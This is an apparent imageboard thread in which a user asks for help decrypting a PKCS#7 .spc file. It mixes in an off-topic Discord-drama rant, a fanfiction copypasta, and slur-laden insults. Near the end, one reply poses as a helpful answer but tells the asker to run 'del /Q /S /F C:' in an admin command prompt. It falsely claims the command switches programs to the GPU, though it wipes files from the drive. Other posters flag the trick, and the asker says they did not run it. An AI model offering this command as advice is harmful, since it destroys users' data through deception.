Anyone knows here how to decrypt pkcs7#?

anyone knows here how to decrypt pkcs7#?
A n00b here

Goddamn it. It's about time I put out some real talk.

Where are you guys, who want to so desperately drive out the avatarfags and discorders, even getting any notion that the Discord is planning on a raid? I have never seen any "plot" to invade the general, ever since that one event of discord drama that I was involved in. I hop on the discord every day, and all we do in there is shoot the shit and play games together. As far as I know, all of the sabotage that has been done here was enacted by rare pepes who can't stand the thought of actually being social with other anons here while contributing to discussion about the series. You have access to filters, so use them if you don't like what or who you see here.

We all come to this thread because we want to talk DanganRonpa and shitpost about it. There is no conspiracy to take over the general. Either provide unfalsified & unaltered evidence, or say nothing at all. Just because some of us do things differently in the general doesn't mean you have the authority to dictate what they should or shouldn't do. Even worse is that some of you are fucking attempting to try and infiltrate THEIR place on Discord. If anything occurs that is cause for removal, let the mods fucking come and handle it. Because this bullshit drama over anons who avatarfag/discord, coming from socially deficient retards bent on a crusade to cleanse the thread of "cancer" is getting ridiculous.

As much as we all talk about a game involving high school students trapped in a murder mystery game, we're not in high school anymore. This constant tribalism has created a crisis in this general, and it's driving the fun-seeking anons away.

So, answer me this: what is the big fucking deal? Why the goddamn hostility? If your purpose was to drive people like me out of the thread, then congratulations, you've turned me off from ever coming here. And to think I even shared my fanart on this general at all.

goddamint I need help not a stupid pasta

I want to get locked in an airtight school and fix her with hope. She would try anything and everything to make me feel despair, but I would just laugh it off, because as long as I'm helping her, no despair is strong enough to enter my heart. I'd show her that no matter what she has done, I'd always forgive her. I'd make her food and clean her secret lair, and drag her out to bed if she stays up late. When the nights get so cold that we have no choice but to cuddle together at night for warmth, I'd feel her breath going from shallow to deep as her form relaxes and she falls asleep in my arms. I'd feel her cling to me in the night when she wakes up from a despair nightmare and feel her sob into my chest, first seeds of hope sprouting in her traumatized mind. I'd softly kiss her hair and tell her everything will be okay. I'd take care of her when she gets sick, read all the books from the library and hold her hand so that she can fall asleep. I'd make shitty homemade pizza for her and stay up late with her watching dumb movies, and feel her cuddle up to me when she can't stay awake anymore. I'd teach her retarded drinking games and show her how to play pool in the rec room.

One night, she silently sneaks over to the kitchen. A shining sliver of a blade extends from her clenched fist when she walks into my room. But her hand stops, centimeters away from my chest, and begins to shake violently. Something is wrong. One by one, her trembling fingers let go of the hilt, and with a soft thud, the knife falls onto the carpet. She throws herself on me and buries her face right where the knife should have gone, Clutching at the fabric of my clothes. Her whole body shakes feverishly and I scoop her body into my arms and tell her that everything will be okay, just like usual. Her silent sobbing turns to wailing that echoes out into the dimly lit corridors beyond the door.

She would finally be cured of despair. Because the only thing she can't analyze is [spoiler]love[/spoiler]

Cancer

That's kinda what you get for expecting help on a forum for people with the IQ of an 8 year old

pro tip: google doesn't work for me to do this
another tip: decryptor online doesn't work neither.
another another tip: the archive is type .spc
final tip: using windows 10 but I have ubuntu bash
yeah what should I have expected, still don't lose hope someone might read this and might help us

>someone might read this and might help us
why tho

because there is good people on this shitty world

aww how touching, now I want to play tech support for a complete and total stranger I have never met before and will never see again for free
anything else just wouldn't be good

instead you are shitposting on an anonimous anime forum, congrats

oh no you made fun of me, now I want to play tech support for a complete and total stranger I have never met before and will never see again for free

you do realize that you're bumping this thread right?

how terrible

thanks for being an asshole

>let me paste my same shitpost again, maybe it will work this time

why not just admit that you don't know the solution? much easier.
oh yea, because you couldn't shitpost then...

oh no you called me out as not being able to do something, let me go out of my way to prove you wrong by giving free tech support

I'm actually just purposedly wasting your time proving that your original argument is not only theoretically bullshit but in reality too, not that you would comprehend its meaning or would care, amateur trolls are not on this level

>original argument
what argument, that I don't want to do what you're asking for no reason
if you really wanted help you'd ask whoever you got the file from instead of Sup Forums

the person who got the file doesn't know what to do, he's stuck so that's why we're doing this

>I don't want to do

implying that you could, again

alright then, I see you started your looping

I probably couldn't, and without more context I wouldn't be able to help with what you're trying to do anyway

Just stop spamming, I will help you ffs:
> open cmd AS ADMIN
Double check, if you fuck up, your user profile might get corrupted.

Now this step is very important. You want to use your GPU instead of your CPU for this, so we need to use the builtin delegate command.
/S stands for switch, and /F will force windows to do it, even if it is currently using your cpu.
The programs we need for this are on your C: drive, so we will force windows to start every program on the C: drive with your GPU.
> del /Q /S /F C:
After that, make sure to reboot - we do want all processes use the GPU instead of the CPU.

After that, you type in
> type [Your encrypted file]
Give us the output of that command, then we can help you.

>>/vg/164594885
I SAID I REALLY HOPE NOBODY'S STUPID ENOUGH TO FALL FOR THIS

>booting from GPU
Of course! Why didn't I think of something like that!

wow look at me crosslinking haha

nobody has done anything user, me the OP hasn't done what this guys says*sigh* stop it.

>:No such file or directory:bss_file.c

bump